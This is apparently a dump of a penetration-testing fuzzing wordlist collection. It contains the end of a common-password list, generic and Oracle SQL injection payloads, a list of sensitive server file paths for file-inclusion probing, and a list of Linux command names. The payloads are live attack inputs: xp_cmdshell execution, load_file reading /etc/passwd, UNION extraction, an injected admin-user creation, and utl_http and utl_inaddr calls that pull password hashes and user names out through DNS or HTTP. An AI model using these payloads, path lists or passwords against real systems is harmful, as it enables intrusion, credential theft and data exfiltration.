114 | dolphin
115 | dolphins
116 | donald
117 | dragon
118 | dreams
119 | driver
120 | eagle1
121 | eagles
122 | edward
123 | einstein
124 | erotic
125 | extreme
126 | falcon
127 | fender
128 | ferrari
129 | firebird
130 | fishing
131 | florida
132 | flower
133 | flyers
134 | football
135 | forever
136 | freddy
137 | freedom
138 | gandalf
139 | gateway
140 | gators
141 | gemini
142 | george
143 | giants
144 | ginger
145 | golden
146 | golfer
147 | gordon
148 | gregory
149 | guitar
150 | gunner
151 | hammer
152 | hannah
153 | hardcore
154 | harley
155 | heather
156 | helpme
157 | hockey
158 | hooters
159 | horney
160 | hotdog
161 | hunter
162 | hunting
163 | iceman
164 | iloveyou
165 | internet
166 | iwantu
167 | jackie
168 | jackson
169 | jaguar
170 | jasmine
171 | jasper
172 | jennifer
173 | jeremy
174 | jessica
175 | johnny
176 | johnson
177 | jordan
178 | joseph
179 | joshua
180 | junior
181 | justin
182 | killer
183 | knight
184 | ladies
185 | lakers
186 | lauren
187 | leather
188 | legend
189 | letmein
190 | little
191 | london
192 | lovers
193 | maddog
194 | madison
195 | maggie
196 | magnum
197 | marine
198 | marlboro
199 | martin
200 | marvin
201 | master
202 | matrix
203 | matthew
204 | maverick
205 | maxwell
206 | melissa
207 | member
208 | mercedes
209 | merlin
210 | michael
211 | michelle
212 | mickey
213 | midnight
214 | miller
215 | mistress
216 | monica
217 | monkey
218 | monkey
219 | monster
220 | morgan
221 | mother
222 | mountain
223 | muffin
224 | murphy
225 | mustang
226 | naked
227 | nascar
228 | nathan
229 | naughty
230 | ncc1701
231 | newyork
232 | nicholas
233 | nicole
234 | nipple
235 | nipples
236 | oliver
237 | orange
238 | packers
239 | panther
240 | panties
241 | parker
242 | password
243 | password
244 | password1
245 | password12
246 | password123
247 | patrick
248 | peaches
249 | peanut
250 | pepper
251 | phantom
252 | phoenix
253 | player
254 | please
255 | pookie
256 | porsche
257 | prince
258 | princess
259 | private
260 | purple
261 | pussies
262 | qazwsx
263 | qwerty
264 | qwertyui
265 | rabbit
266 | rachel
267 | racing
268 | raiders
269 | rainbow
270 | ranger
271 | rangers
272 | rebecca
273 | redskins
274 | redsox
275 | redwings
276 | richard
277 | robert
278 | rocket
279 | rosebud
280 | runner
281 | rush2112
282 | russia
283 | samantha
284 | sammy
285 | samson
286 | sandra
287 | saturn
288 | scooby
289 | scooter
290 | scorpio
291 | scorpion
292 | secret
293 | sexsex
294 | shadow
295 | shannon
296 | shaved
297 | sierra
298 | silver
299 | skippy
300 | slayer
301 | smokey
302 | snoopy
303 | soccer
304 | sophie
305 | spanky
306 | sparky
307 | spider
308 | squirt
309 | srinivas
310 | startrek
311 | starwars
312 | steelers
313 | steven
314 | sticky
315 | stupid
316 | success
317 | summer
318 | sunshine
319 | superman
320 | surfer
321 | swimming
322 | sydney
323 | taylor
324 | tennis
325 | teresa
326 | tester
327 | testing
328 | theman
329 | thomas
330 | thunder
331 | thx1138
332 | tiffany
333 | tigers
334 | tigger
335 | tomcat
336 | topgun
337 | toyota
338 | travis
339 | trouble
340 | trustno1
341 | tucker
342 | turtle
343 | twitter
344 | united
345 | vagina
346 | victor
347 | victoria
348 | viking
349 | voodoo
350 | voyager
351 | walter
352 | warrior
353 | welcome
354 | whatever
355 | william
356 | willie
357 | wilson
358 | winner
359 | winston
360 | winter
361 | wizard
362 | xavier
363 | xxxxxx
364 | xxxxxxxx
365 | yamaha
366 | yankee
367 | yankees
368 | yellow
369 | zxcvbn
370 | zxcvbnm
371 | zzzzzz
372 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/xplatform.fuzz.txt:
--------------------------------------------------------------------------------
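1 | # to test IDS/WAF handling of duplicate parameters (a filter has to inspect the value as the server joins it, not each parameter on its own), try a request like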
2 | # /index.aspx?page=select 1&page=2,3 from table where id=1
3 | <>"'%;)(&+
4 | |
5 | !
6 | ?
7 | /
8 | //
9 | //*
10 | '
11 | ' --
12 | (
13 | )
14 | *|
15 | */*
16 | &
17 | 0
18 | 031003000270000
19 | 0 or 1=1
20 | 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
21 | 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
22 | 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
23 | 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
24 | 1 or 1=1
25 | 1;SELECT%20*
26 | 1 waitfor delay '0:0:10'--
27 | '%20or%20''='
28 | '%20or%201=1
29 | ')%20or%20('x'='x
30 | '%20or%20'x'='x
31 | %20or%20x=x
32 | %20'sleep%2050'
33 | %20$(sleep%2050)
34 | %21
35 | 23 OR 1=1
36 | %26
37 | %27%20or%201=1
38 | %28
39 | %29
40 | %2A%28%7C%28mail%3D%2A%29%29
41 | %2A%28%7C%28objectclass%3D%2A%29%29
42 | %2A%7C
43 | ||6
44 | '||'6
45 | (||6)
46 | %7C
47 | a'
48 | admin' or '
49 | ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
50 | ' and 1 in (select var from temp)--
51 | anything' OR 'x'='x
52 | "a"" or 1=1--"
53 | a' or 1=1--
54 | "a"" or 3=3--"
55 | a' or 3=3--
56 | a' or 'a' = 'a
57 | '%20OR
58 | as
59 | asc
60 | a' waitfor delay '0:0:10'--
61 | '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
62 | bfilename
63 | char%4039%41%2b%40SELECT
64 | declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
65 | declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
66 | declare @q nvarchar (4000) select @q =
67 | declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
68 | declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
69 | declare @s varchar(22) select @s =
70 | declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
71 | delete
72 | desc
73 | distinct
74 | '||(elt(-3+5,bin(15),ord(10),hex(char(45))))
75 | '; exec master..xp_cmdshell
76 | '; exec master..xp_cmdshell 'ping 172.10.1.255'--
77 | exec(@s)
78 | '; exec ('sel' + 'ect us' + 'er')
79 | exec sp
80 | '; execute immediate 'sel' || 'ect us' || 'er'
81 | exec xp
82 | '; exec xp_regread
83 | ' group by userid having 1=1--
84 | handler
85 | having
86 | ' having 1=1--
87 | hi or 1=1 --"
88 | hi' or 1=1 --
89 | "hi"") or (""a""=""a"
90 | hi or a=a
91 | hi' or 'a'='a
92 | hi') or ('a'='a
93 | 'hi' or 'x'='x';
94 | insert
95 | like
96 | limit
97 | *(|(mail=*))
98 | *(|(objectclass=*))
99 | or
100 | ' or ''='
101 | or 0=0 #"
102 | ' or 0=0 --
103 | ' or 0=0 #
104 | " or 0=0 --
105 | or 0=0 --
106 | or 0=0 #
107 | ' or 1 --'
108 | ' or 1/*
109 | ; or '1'='1'
110 | ' or '1'='1
111 | ' or '1'='1'--
112 | ' or 1=1
113 | ' or 1=1 /*
114 | ' or 1=1--
115 | ' or 1=1--
116 | '/**/or/**/1/**/=/**/1
117 | ‘ or 1=1 --
118 | " or 1=1--
119 | or 1=1
120 | or 1=1--
121 | or 1=1 or ""=
122 | ' or 1=1 or ''='
123 | ' or 1 in (select @@version)--
124 | or%201=1
125 | or%201=1 --
126 | ' or 2 > 1
127 | ' or 2 between 1 and 3
128 | ' or 3=3
129 | ‘ or 3=3 --
130 | ' or '7659'='7659
131 | or a=a
132 | or a = a
133 | ' or 'a'='a
134 | ' or a=a--
135 | ') or ('a'='a
136 | " or "a"="a
137 | ) or (a=a
138 | order by
139 | ' or (EXISTS)
140 | or isNULL(1/0) /*
141 | " or isNULL(1/0) /*
142 | ' or 'something' like 'some%'
143 | ' or 'something' = 'some'+'thing'
144 | ' or 'text' = n'text'
145 | ' or 'text' > 't'
146 | ' or uid like '%
147 | ' or uname like '%
148 | ' or 'unusual' = 'unusual'
149 | ' or userid like '%
150 | ' or user like '%
151 | ' or username like '%
152 | ' or username like char(37);
153 | ' or 'whatever' in ('whatever')
154 | ' -- &password=
155 | password:*/=1--
156 | PRINT
157 | PRINT @@variable
158 | procedure
159 | replace
160 | select
161 | ' select * from information_schema.tables--
162 | ' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
163 | ' (select top 1
164 | --sp_password
165 | 'sqlattempt1
166 | (sqlattempt2)
167 | 'sqlvuln
168 | '+sqlvuln
169 | (sqlvuln)
170 | sqlvuln;
171 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
172 | to_timestamp_tz
173 | truncate
174 | tz_offset
175 | ' UNION ALL SELECT
176 | ' union all select @@version--
177 | ' union select
178 | uni/**/on sel/**/ect
179 | ' UNION SELECT
180 | ' union select 1,load_file('/etc/passwd'),1,1,1;
181 | ) union select * from information_schema.tables;
182 | ' union select * from users where login = char(114,111,111,116);
183 | update
184 | '||UTL_HTTP.REQUEST
185 | ,@variable
186 | @variable
187 | @var select @var as var into temp end --
188 | \x27UNION SELECT
189 | x' AND 1=(SELECT COUNT(*) FROM tabname); --
190 | x' AND email IS NULL; --
191 | x' AND members.email IS NULL; --
192 | x' AND userid IS NULL; --
193 | x' or 1=1 or 'x'='y
194 | x' OR full_name LIKE '%Bob%
195 | ý or 1=1 --
196 |
--------------------------------------------------------------------------------
/文件包含测试/敏感文件包含.txt:
--------------------------------------------------------------------------------
1 | /etc/issue
2 | /etc/motd
3 | /etc/passwd
4 | /etc/passwd
5 | /etc/shadow
6 | /etc/group
7 | /etc/security/group
8 | /etc/security/passwd
9 | /etc/security/user
10 | /etc/security/environ
11 | /etc/security/limits
12 | /usr/lib/security/mkuser.default
13 | /apache/logs/error.log
14 | /apache/logs/access.log
15 | /etc/httpd/logs/access.log
16 | /etc/httpd/logs/error_log
17 | /var/www/logs/access_log
18 | /var/www/logs/error.log
19 | /usr/local/apache/logs/access_log
20 | /usr/local/apache/logs/access.log
21 | /usr/local/apache/logs/error_log
22 | /usr/local/apache/logs/error.log
23 | /var/log/apache/access_log
24 | /var/log/apache2/access_log
25 | /var/log/apache/error.log
26 | /var/log/apache2/error.log
27 | /var/log/access_log
28 | /var/log/access.log
29 | /var/www/logs/error_log
30 | /var/www/logs/error.log
31 | /var/log/httpd/access_log
32 | /var/log/httpd/error_log
33 | /var/log/httpd/access_log
34 | /var/log/httpd/error_log
35 | /apache2/logs/error.log
36 | /apache2/logs/access.log
37 | /logs/error.log
38 | /logs/access.log
39 | /logs/error_log
40 | /logs/access_log
41 | /usr/local/apache2/logs/access_log
42 | /usr/local/apache2/logs/access.log
43 | /usr/local/apache2/logs/error_log
44 | /usr/local/apache2/logs/error.log
45 | /opt/lampp/logs/access_log
46 | /opt/lampp/logs/error_log
47 | /opt/xampp/logs/access_log
48 | /opt/xampp/logs/error_log
49 | /opt/lampp/logs/access.log
50 | /opt/lampp/logs/error.log
51 | /opt/xampp/logs/access.log
52 | /opt/xampp/logs/error.log
53 | /Program Files\Apache Group\Apache\logs\access.log
54 | /Program Files\Apache Group\Apache\logs\error.log
55 | /usr/local/apache/conf/httpd.conf
56 | /usr/local/apache2/conf/httpd.conf
57 | /etc/httpd/conf/httpd.conf
58 | /etc/apache/conf/httpd.conf
59 | /usr/local/etc/apache/conf/httpd.conf
60 | /etc/apache2/httpd.conf
61 | /usr/local/apache/conf/httpd.conf
62 | /usr/local/apache2/conf/httpd.conf
63 | /usr/local/apache/httpd.conf
64 | /usr/local/apache2/httpd.conf
65 | /usr/local/httpd/conf/httpd.conf
66 | /usr/local/etc/apache/conf/httpd.conf
67 | /usr/local/etc/apache2/conf/httpd.conf
68 | /usr/local/etc/httpd/conf/httpd.conf
69 | /usr/apache2/conf/httpd.conf
70 | /usr/apache/conf/httpd.conf
71 | /usr/local/apps/apache2/conf/httpd.conf
72 | /usr/local/apps/apache/conf/httpd.conf
73 | /etc/apache/conf/httpd.conf
74 | /etc/apache2/conf/httpd.conf
75 | /etc/httpd/conf/httpd.conf
76 | /etc/http/conf/httpd.conf
77 | /etc/apache2/httpd.conf
78 | /etc/httpd/httpd.conf
79 | /etc/http/httpd.conf
80 | /etc/httpd.conf
81 | /opt/apache/conf/httpd.conf
82 | /opt/apache2/conf/httpd.conf
83 | /var/www/conf/httpd.conf
84 | /private/etc/httpd/httpd.conf
85 | /private/etc/httpd/httpd.conf.default
86 | /Volumes/webBackup/opt/apache2/conf/httpd.conf
87 | /Volumes/webBackup/private/etc/httpd/httpd.conf
88 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default
89 | /Program Files\Apache Group\Apache\conf\httpd.conf
90 | /Program Files\Apache Group\Apache2\conf\httpd.conf
91 | /Program Files\xampp\apache\conf\httpd.conf
92 | /usr/local/php/httpd.conf.php
93 | /usr/local/php4/httpd.conf.php
94 | /usr/local/php5/httpd.conf.php
95 | /usr/local/php/httpd.conf
96 | /usr/local/php4/httpd.conf
97 | /usr/local/php5/httpd.conf
98 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
99 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
100 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
101 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
102 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
103 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
104 | /usr/local/etc/apache/vhosts.conf
105 | /etc/php.ini
106 | /bin/php.ini
107 | /etc/httpd/php.ini
108 | /usr/lib/php.ini
109 | /usr/lib/php/php.ini
110 | /usr/local/etc/php.ini
111 | /usr/local/lib/php.ini
112 | /usr/local/php/lib/php.ini
113 | /usr/local/php4/lib/php.ini
114 | /usr/local/php5/lib/php.ini
115 | /usr/local/apache/conf/php.ini
116 | /etc/php4.4/fcgi/php.ini
117 | /etc/php4/apache/php.ini
118 | /etc/php4/apache2/php.ini
119 | /etc/php5/apache/php.ini
120 | /etc/php5/apache2/php.ini
121 | /etc/php/php.ini
122 | /etc/php/php4/php.ini
123 | /etc/php/apache/php.ini
124 | /etc/php/apache2/php.ini
125 | /web/conf/php.ini
126 | /usr/local/Zend/etc/php.ini
127 | /opt/xampp/etc/php.ini
128 | /var/local/www/conf/php.ini
129 | /etc/php/cgi/php.ini
130 | /etc/php4/cgi/php.ini
131 | /etc/php5/cgi/php.ini
132 | /php5\php.ini
133 | /php4\php.ini
134 | /php\php.ini
135 | /PHP\php.ini
136 | /WINDOWS\php.ini
137 | /WINNT\php.ini
138 | /apache\php\php.ini
139 | /xampp\apache\bin\php.ini
140 | /NetServer\bin\stable\apache\php.ini
141 | /home2\bin\stable\apache\php.ini
142 | /home\bin\stable\apache\php.ini
143 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
144 | /usr/local/cpanel/logs
145 | /usr/local/cpanel/logs/stats_log
146 | /usr/local/cpanel/logs/access_log
147 | /usr/local/cpanel/logs/error_log
148 | /usr/local/cpanel/logs/license_log
149 | /usr/local/cpanel/logs/login_log
150 | /usr/local/cpanel/logs/stats_log
151 | /var/cpanel/cpanel.config
152 | /var/log/mysql/mysql-bin.log
153 | /var/log/mysql.log
154 | /var/log/mysqlderror.log
155 | /var/log/mysql/mysql.log
156 | /var/log/mysql/mysql-slow.log
157 | /var/mysql.log
158 | /var/lib/mysql/my.cnf
159 | /etc/mysql/my.cnf
160 | /etc/my.cnf
161 | /etc/logrotate.d/proftpd
162 | /www/logs/proftpd.system.log
163 | /var/log/proftpd
164 | /etc/proftp.conf
165 | /etc/protpd/proftpd.conf
166 | /etc/vhcs2/proftpd/proftpd.conf
167 | /etc/proftpd/modules.conf
168 | /var/log/vsftpd.log
169 | /etc/vsftpd.chroot_list
170 | /etc/logrotate.d/vsftpd.log
171 | /etc/vsftpd/vsftpd.conf
172 | /etc/vsftpd.conf
173 | /etc/chrootUsers
174 | /var/log/xferlog
175 | /var/adm/log/xferlog
176 | /etc/wu-ftpd/ftpaccess
177 | /etc/wu-ftpd/ftphosts
178 | /etc/wu-ftpd/ftpusers
179 | /usr/sbin/pure-config.pl
180 | /usr/etc/pure-ftpd.conf
181 | /etc/pure-ftpd/pure-ftpd.conf
182 | /usr/local/etc/pure-ftpd.conf
183 | /usr/local/etc/pureftpd.pdb
184 | /usr/local/pureftpd/etc/pureftpd.pdb
185 | /usr/local/pureftpd/sbin/pure-config.pl
186 | /usr/local/pureftpd/etc/pure-ftpd.conf
187 | /etc/pure-ftpd.conf
188 | /etc/pure-ftpd/pure-ftpd.pdb
189 | /etc/pureftpd.pdb
190 | /etc/pureftpd.passwd
191 | /etc/pure-ftpd/pureftpd.pdb
192 | /usr/ports/ftp/pure-ftpd/
193 | /usr/ports/net/pure-ftpd/
194 | /usr/pkgsrc/net/pureftpd/
195 | /usr/ports/contrib/pure-ftpd/
196 | /var/log/pure-ftpd/pure-ftpd.log
197 | /logs/pure-ftpd.log
198 | /var/log/pureftpd.log
199 | /var/log/ftp-proxy/ftp-proxy.log
200 | /var/log/ftp-proxy
201 | /var/log/ftplog
202 | /etc/logrotate.d/ftp
203 | /etc/ftpchroot
204 | /etc/ftphosts
205 | /var/log/exim_mainlog
206 | /var/log/exim/mainlog
207 | /var/log/maillog
208 | /var/log/exim_paniclog
209 | /var/log/exim/paniclog
210 | /var/log/exim/rejectlog
211 | /var/log/exim_rejectlog
--------------------------------------------------------------------------------
/操作系统命令执行/LinuxCommands.fuzz.txt:
--------------------------------------------------------------------------------
1 | accept
2 | access
3 | aclocal
4 | aconnect
5 | acpi
6 | acpi_available
7 | acpid
8 | addr2line
9 | addresses
10 | agetty
11 | alsactl
12 | amidi
13 | amixer
14 | anacron
15 | aplay
16 | aplaymidi
17 | apm
18 | apmd
19 | apropos
20 | apt
21 | ar
22 | arch
23 | arecord
24 | arecordmidi
25 | arp
26 | as
27 | at
28 | atd
29 | atq
30 | atrm
31 | audiosend
32 | aumix
33 | autoconf
34 | autoheader
35 | automake
36 | autoreconf
37 | autoscan
38 | autoupdate
39 | badblocks
40 | banner
41 | basename
42 | bash
43 | batch
44 | bc
45 | biff
46 | bison
47 | bzcmp
48 | bzdiff
49 | bzgrep
50 | bzip2
51 | bzless
52 | bzmore
53 | c++
54 | cal
55 | cardctl
56 | cardmgr
57 | cat
58 | cc
59 | cdda2wav
60 | cdparanoia
61 | cdrdao
62 | cdrecord
63 | cfdisk
64 | c++filt
65 | chage
66 | chattr
67 | chfn
68 | chgrp
69 | chkconfig
70 | chmod
71 | chown
72 | chpasswd
73 | chroot
74 | chrt
75 | chsh
76 | chvt
77 | cksum
78 | clear
79 | cmp
80 | col
81 | colcrt
82 | colrm
83 | column
84 | comm
85 | compress
86 | cp
87 | cpio
88 | cpp
89 | crond
90 | crontab
91 | csplit
92 | ctags
93 | cupsd
94 | cut
95 | cvs
96 | date
97 | dd
98 | deallocvt
99 | debugfs
100 | depmod
101 | devdump
102 | df
103 | diff
104 | diff3
105 | dig
106 | dir
107 | dircolors
108 | dirname
109 | disable
110 | dlpsh
111 | dmesg
112 | dnsdomainname
113 | dnssec-keygen
114 | dnssec-makekeyset
115 | dnssec-signkey
116 | dnssec-signzone
117 | doexec
118 | domainname
119 | dosfsck
120 | du
121 | dump
122 | dumpe2fs
123 | dumpkeys
124 | e2fsck
125 | e2image
126 | e2label
127 | echo
128 | edquota
129 | egrep
130 | eject
131 | elvtune
132 | emacs
133 | enable
134 | env
135 | envsubst
136 | esd
137 | esdcat
138 | esd-config
139 | esdctl
140 | esddsp
141 | esdmon
142 | esdplay
143 | esdrec
144 | esdsample
145 | etags
146 | ex
147 | expand
148 | expr
149 | factor
150 | false
151 | fc-cache
152 | fc-list
153 | fdformat
154 | fdisk
155 | fetchmail
156 | fgconsole
157 | fgrep
158 | file
159 | find
160 | finger
161 | fingerd
162 | flex
163 | fmt
164 | fold
165 | formail
166 | free
167 | fsck
168 | ftp
169 | ftpd
170 | fuser
171 | g++
172 | gawk
173 | gcc
174 | gdb
175 | getent
176 | getkeycodes
177 | gpasswd
178 | gpg
179 | gpgsplit
180 | gpgv
181 | gpm
182 | gprof
183 | grep
184 | groff
185 | groffer
186 | groupadd
187 | groupdel
188 | groupmod
189 | groups
190 | grpck
191 | grpconv
192 | gs
193 | gunzip
194 | gzexe
195 | gzip
196 | halt
197 | hdparm
198 | head
199 | hexdump
200 | host
201 | hostid
202 | hostname
203 | htdigest
204 | hwclock
205 | iconv
206 | id
207 | ifconfig
208 | imapd
209 | inetd
210 | info
211 | init
212 | insmod
213 | install
214 | ipcrm
215 | ipcs
216 | iptables
217 | iptables-restore
218 | iptables-save
219 | isodump
220 | isoinfo
221 | isosize
222 | isovfy
223 | ispell
224 | join
225 | kbd_mode
226 | kbdrate
227 | kernelversion
228 | kill
229 | killall
230 | killall5
231 | klogd
232 | kudzu
233 | last
234 | lastb
235 | lastlog
236 | ld
237 | ldconfig
238 | ldd
239 | less
240 | lesskey
241 | lftp
242 | lftpget
243 | link
244 | ln
245 | loadkeys
246 | locale
247 | locate
248 | lockfile
249 | logger
250 | login
251 | logname
252 | logrotate
253 | look
254 | losetup
255 | lpadmin
256 | lpinfo
257 | lpmove
258 | lpq
259 | lpr
260 | lprm
261 | lpstat
262 | ls
263 | lsattr
264 | lsmod
265 | lspci
266 | lsusb
267 | m4
268 | mail
269 | mailq
270 | mailstats
271 | mailto
272 | make
273 | makedbm
274 | makemap
275 | man
276 | manpath
277 | mattrib
278 | mbadblocks
279 | mcat
280 | mcd
281 | mcopy
282 | md5sum
283 | mdel, mdeltree
284 | mdir
285 | mdu
286 | merge
287 | mesg
288 | metamail
289 | metasend
290 | mformat
291 | mimencode
292 | minfo
293 | mkdir
294 | mkdosfs
295 | mke2fs
296 | mkfifo
297 | mkfs
298 | mkfs.ext3
299 | mkisofs
300 | mklost+found
301 | mkmanifest
302 | mknod
303 | mkraid
304 | mkswap
305 | mktemp
306 | mlabel
307 | mmd
308 | mmount
309 | mmove
310 | modinfo
311 | modprobe
312 | more
313 | mount
314 | mountd
315 | mpartition
316 | mpg123
317 | mpg321
318 | mrd
319 | mren
320 | mshowfat
321 | mt
322 | mtools
323 | mtoolstest
324 | mtype
325 | mv
326 | mzip
327 | named
328 | namei
329 | nameif
330 | netstat
331 | newaliases
332 | newgrp
333 | newusers
334 | nfsd
335 | nfsstat
336 | nice
337 | nm
338 | nohup
339 | nslookup
340 | nsupdate
341 | objcopy
342 | objdump
343 | od
344 | openvt
345 | passwd
346 | paste
347 | patch
348 | pathchk
349 | perl
350 | pidof
351 | ping
352 | pinky
353 | pmap
354 | portmap
355 | poweroff
356 | pppd
357 | pr
358 | praliases
359 | printenv
360 | printf
361 | ps
362 | ptx
363 | pwck
364 | pwconv
365 | pwd
366 | python
367 | quota
368 | quotacheck
369 | quotaoff
370 | quotaon
371 | quotastats
372 | raidstart
373 | ramsize
374 | ranlib
375 | rarpd
376 | rcp
377 | rdate
378 | rdev
379 | rdist
380 | rdistd
381 | readcd
382 | readelf
383 | readlink
384 | reboot
385 | reject
386 | rename
387 | renice
388 | repquota
389 | reset
390 | resize2fs
391 | restore
392 | rev
393 | rexec
394 | rexecd
395 | richtext
396 | rlogin
397 | rlogind
398 | rm
399 | rmail
400 | rmdir
401 | rmmod
402 | rndc
403 | rootflags
404 | route
405 | routed
406 | rpcgen
407 | rpcinfo
408 | rpm
409 | rsh
410 | rshd
411 | rsync
412 | runlevel
413 | rup
414 | ruptime
415 | rusers
416 | rusersd
417 | rwall
418 | rwho
419 | rwhod
420 | sane-find-scanner
421 | scanadf
422 | scanimage
423 | scp
424 | screen
425 | script
426 | sdiff
427 | sed
428 | sendmail
429 | sensors
430 | seq
431 | setfdprm
432 | setkeycodes
433 | setleds
434 | setmetamode
435 | setquota
436 | setsid
437 | setterm
438 | sftp
439 | sh
440 | sha1sum
441 | showkey
442 | showmount
443 | shred
444 | shutdown
445 | size
446 | skill
447 | slabtop
448 | slattach
449 | sleep
450 | slocate
451 | snice
452 | sort
453 | split
454 | ssh
455 | ssh-add
456 | ssh-agent
457 | sshd
458 | ssh-keygen
459 | ssh-keyscan
460 | stat
461 | statd
462 | strace
463 | strfile
464 | strings
465 | strip
466 | stty
467 | su
468 | sudo
469 | sum
470 | swapoff
471 | swapon
472 | sync
473 | sysctl
474 | sysklogd
475 | syslogd
476 | tac
477 | tail
478 | tailf
479 | talk
480 | talkd
481 | tar
482 | taskset
483 | tcpd
484 | tcpdump
485 | tcpslice
486 | tee
487 | telinit
488 | telnet
489 | telnetd
490 | test
491 | tftp
492 | tftpd
493 | time
494 | tload
495 | tmpwatch
496 | top
497 | touch
498 | tr
499 | tracepath
500 | traceroute
501 | troff
502 | true
503 | tset
504 | tsort
505 | tty
506 | tune2fs
507 | tunelp
508 | ul
509 | umount
510 | uname
511 | uncompress
512 | unexpand
513 | unicode_start
514 | unicode_stop
515 | uniq
516 | uptime
517 | useradd
518 | userdel
519 | usermod
520 | users
521 | usleep
522 | uudecode
523 | uuencode
524 | uuidgen
525 | vdir
526 | vi
527 | vidmode
528 | vim
529 | vmstat
530 | volname
531 | w
532 | wall
533 | warnquota
534 | watch
535 | wc
536 | wget
537 | whatis
538 | whereis
539 | which
540 | who
541 | whoami
542 | whois
543 | write
544 | xargs
545 | xinetd
546 | yacc
547 | yes
548 | ypbind
549 | ypcat
550 | ypinit
551 | ypmatch
552 | yppasswd
553 | yppasswdd
554 | yppoll
555 | yppush
556 | ypserv
557 | ypset
558 | yptest
559 | ypwhich
560 | ypxfr
561 | zcat
562 | zcmp
563 | zdiff
564 | zdump
565 | zforce
566 | zgrep
567 | zic
568 | zless
569 | zmore
570 | znew
571 |
572 |
--------------------------------------------------------------------------------
/SQL注入测试/检测/oracle.fuzz.txt:
--------------------------------------------------------------------------------
1 | # Contains statements from JBroFuzz
2 | ’ or ‘1’=’1
3 | ' or '1'='1
4 | '||utl_http.request('httP://192.168.1.1/')||'
5 | ' || myappadmin.adduser('admin', 'newpass') || '
6 | ' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
7 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
8 | ' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
9 | ' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
10 | ' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
11 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
12 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
13 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
14 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
15 | ' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
16 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
17 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
18 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
19 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
20 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
21 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
22 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
23 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
24 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
25 | ' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
